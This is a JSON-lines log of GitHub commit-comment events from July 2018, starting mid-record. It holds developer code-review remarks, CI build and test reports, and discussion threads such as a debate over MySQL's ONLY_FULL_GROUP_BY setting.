|\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc1.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4452)*\n"}},"created_at":"2018-07-13T19:05:40Z"}
{"id":"7963854125","type":"CommitCommentEvent","actor":{"login":"cyb3rist"},"repo":{"name":"cyb3rist/Updatix"},"payload":{"comment":{"id":29704076,"position":null,"line":null,"path":null,"commit_id":"292b52013cf0077d74ed61a58add3d106b25cc33","created_at":"2018-07-13T19:06:32Z","updated_at":"2018-07-13T19:06:32Z","author_association":"OWNER","body":"working on site startupsiliguri.com looking forward to insert functionalities that helps startups from idea stage to setting up & running the service. planing to launch the same version of startupsiliguri nationally to provide the same service but being a platform based web application"}},"created_at":"2018-07-13T19:06:32Z"}
{"id":"7963862287","type":"CommitCommentEvent","actor":{"login":"kamisch"},"repo":{"name":"Groupre/groupre"},"payload":{"comment":{"id":29704091,"position":null,"line":null,"path":null,"commit_id":"9e21bc1f0297ca0c76fbd0dc9889cf3bb15ba24b","created_at":"2018-07-13T19:08:26Z","updated_at":"2018-07-13T19:08:26Z","author_association":"CONTRIBUTOR","body":"Will Do \r\nThank You!"}},"created_at":"2018-07-13T19:08:26Z"}
{"id":"7963868178","type":"CommitCommentEvent","actor":{"login":"andpalmer98"},"repo":{"name":"andpalmer98/L.maackii"},"payload":{"comment":{"id":29704101,"position":null,"line":null,"path":null,"commit_id":"30a0f16d0d278dd10ded494dd2b8ef1b197d4bdb","created_at":"2018-07-13T19:09:45Z","updated_at":"2018-07-13T19:09:45Z","author_association":"OWNER","body":"FINISHED CULLING"}},"created_at":"2018-07-13T19:09:45Z"}
{"id":"7963869156","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29704106,"position":null,"line":null,"path":null,"commit_id":"893a8b69def4b49e9581e883fdbd137b28b7d5b4","created_at":"2018-07-13T19:09:59Z","updated_at":"2018-07-13T19:09:59Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-33](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-33).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-33-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-13T19:09:59Z"}
{"id":"7963869337","type":"CommitCommentEvent","actor":{"login":"RRK1000"},"repo":{"name":"aniketnk/alcoding-data-analysis"},"payload":{"comment":{"id":29704107,"position":null,"line":null,"path":null,"commit_id":"f71da286bbc34e6c3fd35967b2a8d1a5ea5be814","created_at":"2018-07-13T19:10:02Z","updated_at":"2018-07-13T19:10:02Z","author_association":"CONTRIBUTOR","body":"The assignment page is under PrivateRoute. The redirection is already managed by it. Check component/common/PrivateRoute"}},"created_at":"2018-07-13T19:10:02Z"}
{"id":"7963869518","type":"CommitCommentEvent","actor":{"login":"mcristaldo"},"repo":{"name":"jfoclpf/autocosts"},"payload":{"comment":{"id":29704108,"position":4,"line":74,"path":"src/css/style.css","commit_id":"b920bbd744248df57c92694450c2b8b57f77752e","created_at":"2018-07-13T19:10:04Z","updated_at":"2018-07-13T19:10:04Z","author_association":"COLLABORATOR","body":"Oh sorry I thought you didn't touch the style.css file. Yes, put it back please. "}},"created_at":"2018-07-13T19:10:04Z"}
{"id":"7963871263","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29704114,"position":null,"line":null,"path":null,"commit_id":"e3f3d4808c7b84868650e2832fd0904ef6ce53cc","created_at":"2018-07-13T19:10:27Z","updated_at":"2018-07-13T19:10:27Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-32](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-32).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-32-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-13T19:10:27Z"}
{"id":"7963875373","type":"CommitCommentEvent","actor":{"login":"PhocaCz"},"repo":{"name":"joomla-framework/database"},"payload":{"comment":{"id":29704126,"position":null,"line":null,"path":null,"commit_id":"25508b8608b66a790bc48b04915f6edd29814ff0","created_at":"2018-07-13T19:11:26Z","updated_at":"2018-07-13T19:11:26Z","author_association":"NONE","body":"Off topic:\r\n\r\n> minus ONLY_FULL_GROUP_BY because it's inconvenient for some\r\n\r\nNice fallacy. \r\nI think it's a superficial insult to rational reasons why not use the ONLY_FULL_GROUP_BY rule (some of them were listed in discussion)."}},"created_at":"2018-07-13T19:11:26Z"}
{"id":"7963879347","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29704134,"position":null,"line":null,"path":null,"commit_id":"9ccb5df49f8e093bc55e566f3abd3308a011f174","created_at":"2018-07-13T19:12:23Z","updated_at":"2018-07-13T19:12:23Z","author_association":"NONE","body":"I am surprised to see this run as a [0, 5] when it seems like a good argument could be made for [0, 4], i.e., the addition of `/ 2` is trivial and more or less a parameter tweak.\r\n\r\nPerhaps I'm missing something..."}},"created_at":"2018-07-13T19:12:23Z"}
{"id":"7963880188","type":"CommitCommentEvent","actor":{"login":"ihnorton"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":29704136,"position":129,"line":357,"path":"Libs/MRML/Core/vtkMRMLModelDisplayNode.cxx","commit_id":"e776b54bf2d07a2d6addc32ed2b72a91040c621b","created_at":"2018-07-13T19:12:36Z","updated_at":"2018-07-13T19:12:36Z","author_association":"MEMBER","body":"@lassoan I'm curious what this is for. It can't be wrapped in Python, and there is existing caller-allocate path for C++ (safer). Is it used somewhere outside base?"}},"created_at":"2018-07-13T19:12:36Z"}
{"id":"7963886296","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29704147,"position":null,"line":null,"path":null,"commit_id":"317cbbdcabeb3a641a5083ca56ab2363951be0fb","created_at":"2018-07-13T19:14:04Z","updated_at":"2018-07-13T19:14:04Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3857prefer](https://3857prefer-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/guides/drupal-8-composer-no-ci](https://3857prefer-static-docs.pantheonsite.io/docs/guides/drupal-8-composer-no-ci)\n"}},"created_at":"2018-07-13T19:14:04Z"}
{"id":"7963888716","type":"CommitCommentEvent","actor":{"login":"emersion"},"repo":{"name":"swaywm/wlroots"},"payload":{"comment":{"id":29704150,"position":null,"line":null,"path":null,"commit_id":"a0afedcd8fbeb2013252e629d524aa83cdd9326e","created_at":"2018-07-13T19:14:38Z","updated_at":"2018-07-13T19:14:38Z","author_association":"MEMBER","body":"Nack. `wlr_egl_is_current` has no side-effect."}},"created_at":"2018-07-13T19:14:38Z"}
{"id":"7963888839","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29704151,"position":null,"line":null,"path":null,"commit_id":"ee180c57ba07a13b087f669889a842078a5e628d","created_at":"2018-07-13T19:14:39Z","updated_at":"2018-07-13T19:14:39Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - i386-Windows-7-VisualStudio-14: OK (2934 of 2934 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T19:14:39Z"}
{"id":"7963895235","type":"CommitCommentEvent","actor":{"login":"xerub"},"repo":{"name":"Samgisaninja/SuccessionRestore"},"payload":{"comment":{"id":29704162,"position":null,"line":null,"path":null,"commit_id":"c35b3262014089a5bf16e36becb4b8ba79d08197","created_at":"2018-07-13T19:16:11Z","updated_at":"2018-07-13T19:16:11Z","author_association":"NONE","body":"heh, much better than my old janky HFS extractor :)"}},"created_at":"2018-07-13T19:16:11Z"}
{"id":"7963895781","type":"CommitCommentEvent","actor":{"login":"ubiubi18"},"repo":{"name":"ovieio/ovie.me"},"payload":{"comment":{"id":29704166,"position":1,"line":128,"path":"README.md","commit_id":"6a5442c96005ffbd24154961efe12931db8ed65f","created_at":"2018-07-13T19:16:18Z","updated_at":"2018-07-13T19:16:18Z","author_association":"NONE","body":"U - ni - ver - sal ;) "}},"created_at":"2018-07-13T19:16:18Z"}
{"id":"7963896562","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29704169,"position":null,"line":null,"path":null,"commit_id":"75b6b2db8c88a1a7468d2a573dfc37d04aba18e8","created_at":"2018-07-13T19:16:29Z","updated_at":"2018-07-13T19:16:29Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-744](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-744).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-744-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-13T19:16:29Z"}
{"id":"7963896808","type":"CommitCommentEvent","actor":{"login":"bardoman"},"repo":{"name":"bardoman/BardoLand"},"payload":{"comment":{"id":29704174,"position":null,"line":null,"path":null,"commit_id":"fedfe7b4ff6c3e1eb8c80326292e8f0a00ed460f","created_at":"2018-07-13T19:16:32Z","updated_at":"2018-07-13T19:16:32Z","author_association":"OWNER","body":"comment"}},"created_at":"2018-07-13T19:16:32Z"}
{"id":"7963897640","type":"CommitCommentEvent","actor":{"login":"Akunwa"},"repo":{"name":"LillianGonzalezAlbino/FourierAnalysis"},"payload":{"comment":{"id":29704175,"position":null,"line":null,"path":null,"commit_id":"33c6e9a27c7843572b2c5859464ddb6b55b01f24","created_at":"2018-07-13T19:16:45Z","updated_at":"2018-07-13T19:16:45Z","author_association":"COLLABORATOR","body":"changed dict_names function for loop range\r\nAlso switched around the order of plt.legend. That fixed the legend issue "}},"created_at":"2018-07-13T19:16:45Z"}
{"id":"7963905842","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29704198,"position":null,"line":null,"path":null,"commit_id":"4015829486bce3a4cc33c08675d7c6bce9b5d51b","created_at":"2018-07-13T19:18:42Z","updated_at":"2018-07-13T19:18:42Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - x86_64-MacOS-10.9-clang: Tests Failed (2406 of 2935 tests passed, 94 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 529 tests had: Table big diffs.\n * 9 tests had: AUD diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 94\n * Failed: 529\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4015829486bce3a4cc33c08675d7c6bce9b5d51b-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-81.98%25-red.png)</a> \n"}},"created_at":"2018-07-13T19:18:42Z"}
{"id":"7963906516","type":"CommitCommentEvent","actor":{"login":"RazzorX"},"repo":{"name":"cmangos/wotlk-db"},"payload":{"comment":{"id":29704203,"position":19,"line":19,"path":"Updates/1605_creature.sql","commit_id":"0727ca1ea373fa4e5cffb91f4940e35d3199ad02","created_at":"2018-07-13T19:18:52Z","updated_at":"2018-07-13T19:18:52Z","author_association":"CONTRIBUTOR","body":"Add spawndist = 0 prevent a few warning messages.\r\n\r\n> Table `creature` have creature (GUID: 110369 Entry: 25242) with `MovementType`=0 (idle) have `spawndist`<>0, set to 0."}},"created_at":"2018-07-13T19:18:52Z"}
{"id":"7963907547","type":"CommitCommentEvent","actor":{"login":"RazzorX"},"repo":{"name":"cmangos/wotlk-db"},"payload":{"comment":{"id":29704205,"position":34,"line":34,"path":"Updates/1605_creature.sql","commit_id":"0727ca1ea373fa4e5cffb91f4940e35d3199ad02","created_at":"2018-07-13T19:19:07Z","updated_at":"2018-07-13T19:19:07Z","author_association":"CONTRIBUTOR","body":"Add spawndist = 0 prevent a few warning messages."}},"created_at":"2018-07-13T19:19:07Z"}
{"id":"7963908131","type":"CommitCommentEvent","actor":{"login":"vllur"},"repo":{"name":"vllur/school-site"},"payload":{"comment":{"id":29704206,"position":null,"line":null,"path":null,"commit_id":"08717bc54d41e16099cae0eaf91513d570306376","created_at":"2018-07-13T19:19:15Z","updated_at":"2018-07-13T19:19:15Z","author_association":"OWNER","body":"Updated*"}},"created_at":"2018-07-13T19:19:15Z"}
{"id":"7963909484","type":"CommitCommentEvent","actor":{"login":"mbabker"},"repo":{"name":"joomla-framework/database"},"payload":{"comment":{"id":29704208,"position":null,"line":null,"path":null,"commit_id":"25508b8608b66a790bc48b04915f6edd29814ff0","created_at":"2018-07-13T19:19:35Z","updated_at":"2018-07-13T19:19:35Z","author_association":"MEMBER","body":"Well then apparently I've been doing databases wrong for 8 years then because not once have I run into any of the issues listed in that discussion and not once have I had to actually turn this option off to successfully develop and deploy against a MySQL 5.7 database.  So fallacy or not, I do stand by my statement that it is more inconvenient for a group of developers to be required to meet this setting than to just remove it and let people be on their marry way."}},"created_at":"2018-07-13T19:19:35Z"}
{"id":"7963910239","type":"CommitCommentEvent","actor":{"login":"visayafan"},"repo":{"name":"zgq354/weibo-rss"},"payload":{"comment":{"id":29704212,"position":null,"line":null,"path":null,"commit_id":"bb562e9637b847d612433dc653383610325e867b","created_at":"2018-07-13T19:19:45Z","updated_at":"2018-07-13T19:19:45Z","author_association":"NONE","body":"微博的表情图标可以正常显示，没有必要替换成文字吧？\r\n"}},"created_at":"2018-07-13T19:19:45Z"}
{"id":"7963916028","type":"CommitCommentEvent","actor":{"login":"Philius"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29704234,"position":null,"line":null,"path":null,"commit_id":"12ca9e8b521127c5455b8e45b463371cc0cc6d3d","created_at":"2018-07-13T19:21:11Z","updated_at":"2018-07-13T19:21:11Z","author_association":"NONE","body":"I'm adding Arduino + Arduino/Esp32 libraries as components of an esp-idf project by symlinking their sources and adding Kconfig+component.mk but I'm getting an error:\r\nesp32-hal-uart.c:322:109: error: 'volatile union <anonymous>' has no member named 'rd_addr'\r\n\r\nI found two copies of uart_struct.h in my build system\r\n\r\n1. $IDF_PATH/components/soc/esp32/include/soc/uart_struct.h <- doesn't have rd_addr\r\n2. arduino-esp32/tools/sdk/include/soc/soc/uart_struct.h              <- does have rd_addr\r\n\r\nIt looks like my build is getting the first one before the second.\r\n"}},"created_at":"2018-07-13T19:21:11Z"}
{"id":"7963917108","type":"CommitCommentEvent","actor":{"login":"Pannuba"},"repo":{"name":"Pannuba/Windows10-Debloat"},"payload":{"comment":{"id":29704236,"position":null,"line":null,"path":null,"commit_id":"f2e327ce0cdca912fa38cad9ab131b04413259b2","created_at":"2018-07-13T19:21:26Z","updated_at":"2018-07-13T19:21:26Z","author_association":"OWNER","body":"(aggiunti gli shell=true)"}},"created_at":"2018-07-13T19:21:26Z"}
{"id":"7963953948","type":"CommitCommentEvent","actor":{"login":"pauldraper"},"repo":{"name":"jamiebuilds/jamie.build"},"payload":{"comment":{"id":29704317,"position":null,"line":null,"path":null,"commit_id":"b66f185df4c2fb25d7da08ba2529eaff5ec16603","created_at":"2018-07-13T19:30:13Z","updated_at":"2018-07-13T19:30:13Z","author_association":"NONE","body":"> I've always been advised to avoid these \"sub-communities\" like /r/javascript and Hacker News. \r\n\r\n> they are filled with assholes who don't know what they are talking about, angry idiots shouting at everything and everyone, cesspools, giant piles of trash burning in the wind.\r\n\r\nIt better to use \"non-sub-communities\", like /r/all, Facebook, and Twitter.\r\n\r\nThey attract a more sophisticated clientele, and have the thoughtful, rational discussions that HN lacks."}},"created_at":"2018-07-13T19:30:13Z"}
{"id":"7963967607","type":"CommitCommentEvent","actor":{"login":"xiaobin83"},"repo":{"name":"xiaobin83/ShaderForge"},"payload":{"comment":{"id":29704348,"position":null,"line":null,"path":null,"commit_id":"75e534ceac8f1d3ed27c1b713bb34917e85e6c67","created_at":"2018-07-13T19:33:24Z","updated_at":"2018-07-13T19:33:24Z","author_association":"OWNER","body":"also added\r\n  + allowColorMaskWriteThroughProperties\r\n  + custom shader ag\r\n  + fix hardcoded texcoord with  GetVertOutTexcoord()\r\n"}},"created_at":"2018-07-13T19:33:24Z"}
{"id":"7963973197","type":"CommitCommentEvent","actor":{"login":"ggppdk"},"repo":{"name":"joomla-framework/database"},"payload":{"comment":{"id":29704363,"position":null,"line":null,"path":null,"commit_id":"25508b8608b66a790bc48b04915f6edd29814ff0","created_at":"2018-07-13T19:34:46Z","updated_at":"2018-07-13T19:34:46Z","author_association":"NONE","body":"@mbabker \r\n\r\nThe performance issues of having deterministic queries by adding functional or non-functional dependent columns in the group by clause are undeniable \r\n\r\nhttps://dev.mysql.com/worklog/task/?id=2489\r\n\r\nJust MySQL 5.7 improved on the issue by allowing at least the functional dependent columns not to be required in the group by clause\r\n\r\nRegarding the motivations of full_group_by \r\n**motivation 1:** having deterministic result for non-functional dependent columns ?\r\n\r\nis it really that the developers do not know what they are doing ?\r\nif they want their non-functional dependent columns to have a guaranteed (deterministic) value,\r\nthen they will add it to the group by clause , their responsibility\r\n\r\n**motivation 2:** lazy supporting supporting PostgreSQL ?, without testing with it, but by testing with MySQL ?\r\nif Joomla Core continue to write SQL queries with all non-functional dependent columns in the Group By then , the queries will continue to work in PostgreSQL too\r\nabout if the 3rd party will do it, is should be their responsibility to support PostgreSQL by adding non-functional dependent columns in the Group By \r\n"}},"created_at":"2018-07-13T19:34:46Z"}
{"id":"7963973593","type":"CommitCommentEvent","actor":{"login":"airspeedswift"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29704364,"position":11,"line":190,"path":"lib/SILOptimizer/FunctionSignatureTransforms/FunctionSignatureOpts.cpp","commit_id":"330be4a38e7339f08465544afbb17385e4655b03","created_at":"2018-07-13T19:34:53Z","updated_at":"2018-07-13T19:34:53Z","author_association":"MEMBER","body":"This introduced a warning in no-asserts builds."}},"created_at":"2018-07-13T19:34:53Z"}
{"id":"7963975386","type":"CommitCommentEvent","actor":{"login":"vinisantannaa"},"repo":{"name":"akarimova/OpenIAB"},"payload":{"comment":{"id":29704366,"position":null,"line":null,"path":null,"commit_id":"ddda4736d4bcb537a1ae0f462eee28a95867f735","created_at":"2018-07-13T19:35:18Z","updated_at":"2018-07-13T19:35:18Z","author_association":"NONE","body":"Hi ... \r\nI downloaded the OpenIAB purchase plugin. Every time I start the application, it opens a Manifest with the background of the plugin, I wanted to remove it. This background is the same that appears when I send a purchase. How do I remove the background from this manifest?"}},"created_at":"2018-07-13T19:35:18Z"}
{"id":"7963976459","type":"CommitCommentEvent","actor":{"login":"jeromesimeon"},"repo":{"name":"accordproject/ergo"},"payload":{"comment":{"id":29704368,"position":null,"line":null,"path":null,"commit_id":"72bc80e546caeb044acd49c8592af501a362e39f","created_at":"2018-07-13T19:35:34Z","updated_at":"2018-07-13T19:35:34Z","author_association":"CONTRIBUTOR","body":"Is there an award for best commit message? 🥇 "}},"created_at":"2018-07-13T19:35:34Z"}
{"id":"7963977954","type":"CommitCommentEvent","actor":{"login":"jfoclpf"},"repo":{"name":"jfoclpf/autocosts"},"payload":{"comment":{"id":29704370,"position":4,"line":74,"path":"src/css/style.css","commit_id":"b920bbd744248df57c92694450c2b8b57f77752e","created_at":"2018-07-13T19:35:57Z","updated_at":"2018-07-13T19:35:57Z","author_association":"OWNER","body":"perfect :)\nNo problems\n\nJoão Pimentel Ferreira <http://joaopimentel.eu>\n\n\nOn Fri, 13 Jul 2018 at 21:10, Martín Cristaldo <notifications@github.com>\nwrote:\n\n> Oh sorry I thought you didn't touch the style.css file. Yes, put it back\n> please.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jfoclpf/autocosts/commit/b920bbd744248df57c92694450c2b8b57f77752e#commitcomment-29704108>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADzODaTK7hrRFSvnv8s02p6hsuQD1GzHks5uGPCNgaJpZM4VPXsJ>\n> .\n>\n"}},"created_at":"2018-07-13T19:35:57Z"}
{"id":"7963978618","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29704374,"position":null,"line":null,"path":null,"commit_id":"0a42a29883cd1214bbe10a2ba51e42106001bb66","created_at":"2018-07-13T19:36:07Z","updated_at":"2018-07-13T19:36:07Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3857prefer](https://3857prefer-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/guides/drupal-8-composer-no-ci](https://3857prefer-static-docs.pantheonsite.io/docs/guides/drupal-8-composer-no-ci)\n"}},"created_at":"2018-07-13T19:36:07Z"}
{"id":"7963979663","type":"CommitCommentEvent","actor":{"login":"valbert29"},"repo":{"name":"valbert29/SummerPractice2018"},"payload":{"comment":{"id":29704376,"position":null,"line":null,"path":null,"commit_id":"3ffbe54b077efe50571f84c86373d04108f3ae71","created_at":"2018-07-13T19:36:22Z","updated_at":"2018-07-13T19:36:22Z","author_association":"OWNER","body":"ОПЯТЬ НЕ РАБОТАЕТ"}},"created_at":"2018-07-13T19:36:22Z"}
{"id":"7963979893","type":"CommitCommentEvent","actor":{"login":"crtlib"},"repo":{"name":"symfony/console"},"payload":{"comment":{"id":29704377,"position":null,"line":null,"path":null,"commit_id":"7afe26f4eca9b4fb2009c4a5b035f74ed2872807","created_at":"2018-07-13T19:36:26Z","updated_at":"2018-07-13T19:36:26Z","author_association":"NONE","body":"The problem is with the version in the packagist (https://packagist.org/packages/symfony/contracts) which references the rewritten commit 😐Please, update!"}},"created_at":"2018-07-13T19:36:26Z"}
{"id":"7963980652","type":"CommitCommentEvent","actor":{"login":"iancoolidge89"},"repo":{"name":"boundarydevices/meta-freescale-3rdparty"},"payload":{"comment":{"id":29704378,"position":9,"line":34,"path":"conf/machine/nitrogen8m.conf","commit_id":"f3813f0454c62c6afb05eccfb0c8f7ee7828849e","created_at":"2018-07-13T19:36:38Z","updated_at":"2018-07-13T19:36:38Z","author_association":"NONE","body":"Yeah, I double checked we were on the same branches too.\n\nutilities.inc definitely calls out for Image-imx8mq-nitrogen8m.dtb\n\nFor now, this should work even though its a bit redundant. I made the\nchange here instead of imx-base.inc in case someone brighter has a better\nsolution\n\nOn Fri, Jul 13, 2018 at 1:05 AM, Gary Bisson <notifications@github.com>\nwrote:\n\n> That's super strange, if definitely worked for me without that change:\n> $ ls -l /media/gbisson/boot/\n> total 18960\n> -rw-r--r-- 1 gbisson gbisson 4196 Jul 11 14:45 boot.scr\n> -rw-r--r-- 1 gbisson gbisson 19309056 Jul 11 14:45 Image\n> -rw-r--r-- 1 gbisson gbisson 47427 Jul 11 14:45 imx8mq-nitrogen8m.dtb\n> -rw-r--r-- 1 gbisson gbisson 47545 Jul 11 14:45 imx8mq-nitrogen8m-m4.dtb\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/boundarydevices/meta-freescale-3rdparty/commit/f3813f0454c62c6afb05eccfb0c8f7ee7828849e#commitcomment-29696235>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHzhYQoRqKa91VqF78QIkG5L4g2Yg3guks5uGFTigaJpZM4VOePj>\n> .\n>\n"}},"created_at":"2018-07-13T19:36:38Z"}
{"id":"7963981321","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29704380,"position":null,"line":null,"path":null,"commit_id":"8503cd7fa8ed25a15b2aa8bfe01a8e3682d684cd","created_at":"2018-07-13T19:36:49Z","updated_at":"2018-07-13T19:36:49Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.09 |\n| `metadata_passing` |     1    |\n| `metadata_total`   |    -5    |\n| `nodes_count`      |     1    |\n| `texts_total`      |    -1    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |    +1497 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/phi0010/__cts__.xml`                            | Deleted  |\n| `./data/phi0010/tlg001/__cts__.xml`                     | Deleted  |\n| `./data/phi0010/tlg0010/__cts__.xml`                    | Deleted  |\n| `./data/tlg0006/tlg002/__cts__.xml`                     | Deleted  |\n| `./data/tlg0014/tlg002/__cts__.xml`                     | Deleted  |\n| `./data/tlg0014/tlg003/__cts__.xml`                     | Deleted  |\n| `./data/tlg0019/tlg006/tlg0019.tlg006.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0035/tlg001/tlg0035.tlg001.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0086/tlg045/__cts__.xml`                     | New      |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc2.xml` | New      |\n| `./data/tlg0006/tlg011/__cts__.xml`                     | Passing  |\n| `./data/tlg0019/tlg006/__cts__.xml`                     | Passing  |\n| `./data/tlg0086/tlg045/__cts__.xml`                     | Failing  |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc2.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4453)*\n"}},"created_at":"2018-07-13T19:36:49Z"}
{"id":"7963981975","type":"CommitCommentEvent","actor":{"login":"cwsmith"},"repo":{"name":"SCOREC/core"},"payload":{"comment":{"id":29704382,"position":27,"line":642,"path":"mds/apfMDS.cc","commit_id":"9a4fdd14a9f78ca7ad147459d3ac510a0d0c8197","created_at":"2018-07-13T19:36:59Z","updated_at":"2018-07-13T19:36:59Z","author_association":"CONTRIBUTOR","body":"This will write one message to stdout per rank if called in parallel.  Can this be removed or wrapped in an `if ( !PCU_Comm_Self() )` ?"}},"created_at":"2018-07-13T19:36:59Z"}
{"id":"7963982166","type":"CommitCommentEvent","actor":{"login":"fabpot"},"repo":{"name":"symfony/console"},"payload":{"comment":{"id":29704383,"position":null,"line":null,"path":null,"commit_id":"7afe26f4eca9b4fb2009c4a5b035f74ed2872807","created_at":"2018-07-13T19:37:02Z","updated_at":"2018-07-13T19:37:02Z","author_association":"MEMBER","body":"fixed"}},"created_at":"2018-07-13T19:37:02Z"}
{"id":"7963982419","type":"CommitCommentEvent","actor":{"login":"cg505"},"repo":{"name":"josteink/csharp-mode"},"payload":{"comment":{"id":29704385,"position":null,"line":null,"path":null,"commit_id":"c66916ef5c2a73dce2cc2a0845ca47e8c8abb2f9","created_at":"2018-07-13T19:37:07Z","updated_at":"2018-07-13T19:37:07Z","author_association":"NONE","body":"Awesome, it's up. Thank you!"}},"created_at":"2018-07-13T19:37:07Z"}
{"id":"7963982893","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29704386,"position":null,"line":null,"path":null,"commit_id":"1c95641a271272ff7f9b4df197fc8d1cc19bc8fd","created_at":"2018-07-13T19:37:13Z","updated_at":"2018-07-13T19:37:13Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: Tests Failed (1757 of 3310 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 627\n\nregression Test Summary\n * Passed: 624\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1c95641a271272ff7f9b4df197fc8d1cc19bc8fd-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1c95641a271272ff7f9b4df197fc8d1cc19bc8fd-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-53.08%25-red.png)</a> \n"}},"created_at":"2018-07-13T19:37:13Z"}
{"id":"7963983056","type":"CommitCommentEvent","actor":{"login":"jyrkive"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29704387,"position":21,"line":82,"path":"src/gui/widgets/tree_view.cpp","commit_id":"e247892616aca160fea8df5d34fcca52c891baf2","created_at":"2018-07-13T19:37:16Z","updated_at":"2018-07-13T19:37:16Z","author_association":"MEMBER","body":"`std::move()` here is pointless. Binding the return value to a variable turns it into an lvalue."}},"created_at":"2018-07-13T19:37:16Z"}
